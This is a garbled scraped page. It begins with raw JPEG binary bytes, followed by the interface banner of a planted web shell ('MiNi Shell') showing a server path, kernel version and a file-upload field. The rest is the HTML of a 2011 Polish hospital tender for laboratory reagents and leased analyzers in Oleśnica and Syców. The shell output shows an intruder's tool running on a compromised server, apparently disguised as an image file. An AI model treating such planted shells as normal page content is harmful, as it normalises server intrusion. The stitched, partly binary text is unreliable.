JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110415/80810-N-2011.html

<p class="kh_header"><b>Oleśnica: Przedmiotem zamówienia jest dostawa odczynników i materiałów zużywalnych wraz z dzierżawą analizatorów dla laboratoriów w Oleśnicy i Sycowie</b><br>
<b>Numer ogłoszenia: 80810 - 2011; data zamieszczenia: 15.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Szpitali w Oleśnicy , ul. Armii Krajowej 1, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3143747, faks 071 3143747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzsolesnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa odczynników i materiałów zużywalnych wraz z dzierżawą analizatorów dla laboratoriów w Oleśnicy i Sycowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odczynników i materiałów zużywalnych wraz z dzierżawą analizatorów dla laboratoriów w Oleśnicy i Sycowie

Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr 1, 2, 3, 4, 5, 6, 7, 8, 9 do SIWZ.

Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne pakiety:
Pakiet nr  1 - dostawa odczynników i materiałów zużywalnych do badań chemiluminescencyjnych wraz z dzierżawą analizatora dla laboratorium w Oleśnicy
Pakiet nr 2 - dostawa odczynników i materiałów zużywalnych do badań RKZ wraz z dzierżawą dwóch analizatorów dla laboratoriów w Oleśnicy i Sycowie
Pakiet nr 3 - dostawa odczynników i materiałów zużywalnych do badań biochemicznych wraz z dzierżawą analizatora dla laboratorium w Oleśnicy
Pakiet nr 4 - dostawa odczynników i materiałów zużywalnych do badań immunochemicznych wraz z dzierżawą analizatora dla laboratorium w Sycowie
Pakiet nr 5 - dostawa odczynników i materiałów zużywalnych do badań biochemicznych dla laboratorium w Sycowie
Pakiet nr 6 - dostawa odczynników i materiałów zużywalnych do oznaczania poziomu troponiny wraz z dzierżawą analizatora dla laboratorium w Sycowie
Pakiet nr 7 - dostawa odczynników i materiałów zużywalnych do oznaczania elektrolitów wraz z dzierżawą analizatora dla laboratorium w Sycowie
Pakiet nr 8 - zakup podłoży płynnych do posiewów krwi i płynów ustrojowych do automatycznego systemu do hodowli drobnoustrojów oraz na dzierżawę automatycznego systemu do hodowli drobnoustrojów oraz na dzierżawę automatycznego systemu do posiewów krwi i płynów ustrojowych
Pakiet nr 9 - dostawa materiałów do wykonywania badań z zakresu mikrobiologii.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.20-7, 33.69.62.00-7, 33.69.65.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) Deklaracje zgodności CE 
b)  zgłoszenie lub wpis do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania (nie dotyczy klasy wyrobu medycznego I i IIa pod warunkiem, że pierwsze jego wprowadzenie nastąpiło w innym niż Polska kraju Unii Europejskiej, zgodnie z przepisami ustawy z dnia 20.04.2004 r. o Wyrobach Medycznych - w takim przypadku należy złożyć stosowne wyjaśnienie.
c) Dokumenty potwierdzające spełnianie przez przedmiot zamówienia przedstawiony w złożonej przez Wykonawcę ofercie, parametrów ocenianych przez Zamawiającego
d) Dokumenty (materiały informacyjne) z parametrami technicznymi oferowanych aparatów, z których wynika spełnienie parametrów wymaganych przez Zamawiającego i oferowanych przez Wykonawcę</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)  wypełniony formularz dot. Pakietu, którego dotyczy składana oferta (odpowiednio załączniki nr 1-9 do SIWZ)
b) w przypadku reprezentowania Wykonawcy przez pełnomocnika, do oferty musi być załączony oryginał pełnomocnictwa lub jego kopia poświadczona notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzsolesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2011 godzina 09:00, miejsce: Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica
piętro IV, pokój 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1 - Odczynniki i materiały zużywalne do badań chemiluminescencyjnych wraz dzierżawą analizatora dla laboratorium w Oleśnicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analizator:
Parametr wymagany:
Testy wykonywane metodą chemiluminescencyjną lub elektrochemiluminescencyjną
Pełna automatyzacja analiz
Minimum 12 miejsc na odczynniki
Wydajność aparatu minimum 80 oznaczeń/h
Możliwość priorytetowego wykonania próbek cito
Chłodzenie odczynników na pokładzie analizatora
Stabilność kalibracji minimum 28 dni
Automatyczne monitorowanie zużycia odczynników
Możliwość wykonywania badań przy wykorzystaniu próbek pierwotnych
Praca analizatora w trybie swobodnego dostępu
Identyfikacja próbek i odczynników na podstawie kodów kreskowych przy użyciu wbudowanego czytnika
Możliwość dostawiania próbek podczas pracy analizatora
Wbudowany system kontroli jakości
Możliwość archiwizacji danych
Instrukcja obsługi w języku polskim
Możliwość współpracy z laboratoryjnym systemem informatycznym (LIS) - przesył danych z wykorzystaniem komunikacji dwukierunkowej 
Gwarancja i serwis gwarancyjny w okresie umowy, 
(w tym 2 obowiązkowe przeglądy techniczne analizatora na rok)
Analizator wyposażony w zewnętrzny UPS umożliwiający podtrzymanie pracy analizatora w przypadku zaniku zasilania
Możliwość wykonania oznaczenia troponiny w czasie nie dłuższym niż 15 minut, wraz z możliwością jednoczesnego wykonywania pozostałych badań immunochemicznych
Trwałość odczynników, kalibratorów i materiałów kontrolnych minimum 6 miesięcy od daty dostawy 
Odczynniki gotowe do użycia, pakowane w pojemniki nadające się do bezpośredniego włożenia do analizatora
Wykonawca uwzględni w ofercie zakup kontroli międzynarodowej dla parametrów kardiologicznych w cyklach pólrocznych (1 cykl - 13 próbek kontrolnych) przez cały okres trwania umowy
Wymagane parametry kontroli:
2 oznaczane parametry
oznaczenia co 2 tygodnie,
możliwość elektronicznego przesyłania danych oraz zarejestrowania więcej niż jednego aparatu/kontrolę

Niespełnienie choćby jednego wymaganego parametru odczynników spowoduje odrzucenie oferty.

Kryteria oceny parametrów technicznych odczynników i analizatora:
Cechy podlegające ocenie
1. Lodówka do przechowywania odczynników na pokładzie analizatora
tak -18 pkt
nie - 0 pkt	
2. System zapobiegający <carry over> (przeniesieniu materiału pomiędzy próbkami) nie wymagający materiałów jednorazowego użytku
tak - 2 pkt
nie - 0 pkt
Oferent ma obowiązek przedstawienia w ofercie dokumentacji, na podstawie której Zamawiający dokona oceny przedstawionych parametrów analizatora i odczynników

1. Odczynniki
1 - TSH 3 gen - ilość oznaczeń: 4800	 	 	 	 	 	 	
2 - fT3 (wolne fT3) - ilość oznaczeń: 900	 	 	 	 	 	 	
3 - fT4 (wolne fT4) - ilość oznaczeń: 1300	 	 	 	 	
4 - PSA - ilość oznaczeń: 1500	 	 	
5 - Troponina - ilość oznaczeń: 6100	 	 	 	 	 	 	

Wykonawca zobowiązany jest wyliczyć wartość oferty uwzględniając wielkość opakowań i zaokrąglając w górę do pełnego opakowania
Przy obliczaniu ilości potrzebnych opakowań Wykonawca uwzględni trwałość zestawów odczynnikowych na pokładzie analizatora
Przy obliczaniu ilości potrzebnych opakowań odczynników do podanych wyżej ilości oznaczeń należy doliczyć niezbędne oznaczenia kalibracyjne
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. W przypadku nie 
Uwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego zapewnienia tego asortymentu Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do Zamawiającego.

2. Materiały zużywalne i eksploatacyjne
1. Kontrole	 	 	 	 	 	 	
2. Materiały eksploatacyjne	 	 	 	 	 	 	

W przypadku materiałów kontrolnych do TSH (poz. 1 zestawienia) Wykonawca uwzględni wykonywanie kontroli 3 razy w tygodniu
W przypadku materiałów kontrolnych do Troponiny (poz. 5 zestawienia) Wykonawca uwzględni wykonywanie kontroli codziennie
W przypadku materiałów kontrolnych do fT3, fT4 i PSA (poz. 2 - 4 zestawienia) Wykonawca uwzględni wykonywanie kontroli 2 razy w tygodniu
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. 
W przypadku nie uwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego 
zapewnienia tego asortymentu Zamawiającemu. 
Wykonawca pokrywa koszt zakupu i transportu towaru do Zamawiającego.
W tabeli 2 (Materiały zużywalne i eksploatacyjne) Wykonawca uwzględni koszt podłączenia i konfiguracji analizatora do laboratoryjnego systemu 
informatycznego (LIS) E-LAB firmy Eclipse.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.20-7, 33.69.62.00-7, 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. ocena parametrów technicznych - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 - Odczynniki i materiały zużywalne do badań RKZ wraz dzierżawą 2 analizatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analizator: 
Opis parametrów
Parametry mierzone:     pH,pCO2,pO2,Hct, Hb,SO2, Na, K, Cl, Ca
Wszystkie elektrody pomiarowe bezobsługowe
Dowolne definiowanie panelu parametrów mierzonych
Możliwość wykonania badań w krwi pełnej, surowicy lub osoczu
Podanie próbki bezpośrednio ze strzykawki lub kapilary
Mała objętość analizowanej próbki
Odczynniki w zamkniętych oddzielnych pojemnikach, wymieniane zależnie od zużycia
Automatyczna kalibracja ,jedno i dwupunktowa bez użycia zewnętrznych gazów kalibracyjnych
Termin ważności odczynników po instalacji w aparacie nie krótszy niż 30 dni
Zamknięte niezależne ścieki
Automatyczne procedury czyszczenia toru pomiarowego i kondycjonowania elektrod
Prosta komunikacja z operatorem-przejrzyste oprogramowanie
Możliwość wpisania szczegółowych danych demograficznych pacjenta
Pamięć wyników pomiarów
Oprogramowanie kontroli jakości, pamięć wyników kontroli
Możliwość wprowadzania danych identyfikacyjnych próbki przy pomocy czytnika kodów kreskowych
Możliwość współpracy z laboratoryjnym systemem informatycznym (LIS)
Zabezpieczenie analizatora przy pomocy zasilacza UPS
Gwarancja i serwis gwarancyjny w okresie umowy, (w tym obowiązkowy przegląd techniczny analizatora raz w roku)
Niespełnienie któregoś z warunków granicznych powoduje odrzucenie oferty.

ilość planowanych badań:							
analizator Syców - 1100 w okresie umowy (24 miesiące)					
analizator Oleśnica - 11000 w okresie umowy (24 miesiące)					
oferta powinna obejmować wszystkie niezbędne do wykonania badań odczynniki i części zużywalne (elektrody; wężyki pomp itd.) z wyjątkiem materiałów kontrolnych

Wykonawca zobowiązany jest wyliczyć wartość oferty uwzględniając wielkość opakowań i zaokrąglając w górę do pełnego opakowania
Przy obliczaniu ilości potrzebnych opakowań Wykonawca uwzględni trwałość zestawów odczynnikowych na pokładzie analizatora
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. W przypadku nie uwzględnienia
asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego zapewnienia tego asortymentu Zamawiającemu. Wykonawca
pokrywa koszt zakupu i transportu towaru do Zamawiającego.
W tabeli Wykonawca uwzględni koszt podłączenia i konfiguracji analizatora do laboratoryjnego systemu informatycznego (LIS) E-LAB firmy Eclipse.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.20-7, 33.69.62.00-7, 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3 - Odczynniki i materiały zużywalne do badań biochemicznych wraz dzierżawą analizatora dla laboratorium w Oleśnicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analizator:
Określenie parametru 
Analizator wyprodukowany w latach 2008 - 2010
Analizator w pełni automatyczny pracujący w trybie pacjent po pacjencie.
Wydajność analizatora minimum 400 oznaczeń fotometrycznych na godzinę
Metody wykonywania oznaczeń:
- fotometria (w tym pomiary monochromatyczne i bichromatyczne, punktu końcowego i kinetyczne)
- turbidymetria
- elektrody jonoselektywne ISE do oznaczeń (Na K Cl)
Odczynniki płynne, analiza w fazie ciekłej
Możliwości analityczne:
enzymy, substraty, ISE, białka specyficzne, etanol
Możliwość wykonywania badań w surowicy, osoczu, moczu i hemolizacie
Automatyczne rozcieńczanie oznaczanej próbki, po przekroczeniu liniowości metody
Pobieranie próbek i odczynników przez osobne igły pipetujące (dwuigłowy system pipetujący)
Detektor skrzepu w próbce
Możliwość jednoczesnego wstawienia próbek pierwotnych (różnych systemów pobierania), próbek pediatrycznych oraz przelewanych
Chłodzenie odczynników na pokładzie analizatora
Chłodzenie kalibratorów i kontroli na pokładzie analizatora
Identyfikacja odczynników z wykorzystaniem kodów kreskowych i wewnętrznego czytnika tych kodów
Kuwety wielorazowe ze szkła kwarcowego
Identyfikacja próbek przy pomocy kodów kreskowych
Stałe monitorowanie poziomu odczynników, płynów i badanych próbek.
Priorytetowe wykonywanie badań cito
Możliwość tworzenia profili badań
Możliwość dostawiania próbek bez przerywania pracy analizatora
Stacja uzdatniania wody
Oprogramowanie użytkownika w języku polskim 
Wbudowany program kontroli jakości umożliwiający graficzną prezentację wyników kontroli i możliwość stosowania reguł kontrolnych (Westgarda)
Możliwość współpracy z laboratoryjnym systemem informatycznym (LIS) - przesył danych z wykorzystaniem komunikacji dwukierunkowej 
Gwarancja i serwis gwarancyjny w okresie umowy, 
(w tym 2 obowiązkowe przeglądy techniczne analizatora na rok)
Analizator wyposażony w komputer, i  zewnętrzny UPS umożliwiający podtrzymanie pracy analizatora w przypadku zaniku zasilania
W przypadku gdy oferowany analizator nie jest wolnostojący Wykonawca dostarcza stół bez dodatkowych opłat
Wykonawca uwzględni w ofercie zakup biochemicznej kontroli międzynarodowej w cyklach pólrocznych (1 cykl - 13 próbek kontrolnych) przez cały okres trwania umowy
Wymagane parametry kontroli:
46 oznaczanych parametrów,
oznaczenia co 2 tygodnie, 
możliwość elektronicznego przesyłania danych oraz zarejestrowania więcej niż jednego aparatu/kontrolę
Niespełnienie któregoś z warunków granicznych powoduje odrzucenie oferty.

Ocena techniczno-użytkowa


Kryteria oceny parametrów technicznych odczynników i analizatora.
Cechy podlegające ocenie:
1. Automatyczny podajnik statywów próbkowych
Tak - 20 pkt
Nie - 0 pkt
2. Wydajność modułu ISE min 400 ozn/godz
Tak - 8 pkt
Nie - 0 pkt	
3. Powietrzny inkubator kuwet reakcyjnych
Tak - 2 pkt
Nie - 0 pkt	
	
Oferent ma obowiązek przedstawienia w ofercie dokumentacji, na podstawie której Zamawiający dokona oceny przedstawionych parametrów analizatora i odczynników.

1. Odczynniki:
1. Fosfataza alkaliczna - ilość: 2400
2. Aminotransferaza alaniniowa - ilość: 5800
3. Aminotransferaza asparaginowa - ilość: 5800
4. Amylaza - ilość: 3400
5. GGTP - ilość: 4000
6. Lipaza - ilość: 1900
7. Albumina - ilość: 500
8. Białko całkowite - ilość: 2600
9. Bilirubina całkowita - ilość: 8100
10. Bilirubina bezpośrednia - ilość: 3400
11. Cholesterol całkowity - ilość: 4400
12. Cholesterol HDL (bezpośredni) - ilość: 3200
13. Fosfor - ilość: 600
14. Glukoza (met. heksokinazowa) ilość: 19200
15. Kreatynina - ilość: 17000
16. Kwas moczowy - ilość: 2200
17. Magnez - ilość: 2400
18. Mocznik	 - ilość: 14400
19. Trójglicerydy - ilość: 3600
20. Wapń - ilość: 1600
21. Żelazo - ilość: 600
22. CRP - ilość: 11400
23. D-dimery - ilość: 1000
24. Hemoglobina glikowana (HbA1c) - ilość: 1800
25. Etanol - ilość: 700
26. Białko w moczu/PMR - ilość: 700
27. Sód (Na) - ilość: 27200
28. Potas (K) - ilość: 27200
29. Chlorki (Cl) - ilość: 27200
Wykonawca zobowiązany jest wyliczyć wartość oferty uwzględniając wielkość opakowań i zaokrąglając w górę do pełnego opakowania
Przy obliczaniu ilości potrzebnych opakowań Wykonawca uwzględni trwałość zestawów odczynnikowych na pokładzie analizatora
Przy obliczaniu ilości potrzebnych opakowań odczynników do podanych wyżej ilości oznaczeń należy doliczyć niezbędne oznaczenia kalibracyjne
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. 
W przypadku nie uwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego 
zapewnienia tego asortymentu Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do Zamawiającego.

2.Materiały kontrolne i kalibratory

Trwałość kalibratorów  i materiałów kontrolnych minimum 6 miesięcy od daty dostawy					
W przypadku materiałów kontrolnych Wykonawca uwzględni wykonywanie kontroli każdego parametru 
(z wyjątkiem D-dimerów poz. 23, Hemoglobiny glikowanej HbA1c - poz 24 i białka w moczu - poz. 26), codziennie, na 2 poziomach materiału kontrolnego
W przypadku materiałów kontrolnych do D-dimerów (poz. 23 zestawienia) Wykonawca uwzględni wykonywanie kontroli 2 razy w tygodniu 
na 2 poziomach.
W przypadku materiałów kontrolnych do Hemoglobiny glikowanej HbA1c (poz 24 zestawienia) Wykonawca uwzględni wykonywanie 
kontroli 1 raz w tygodniu na 2 poziomach .
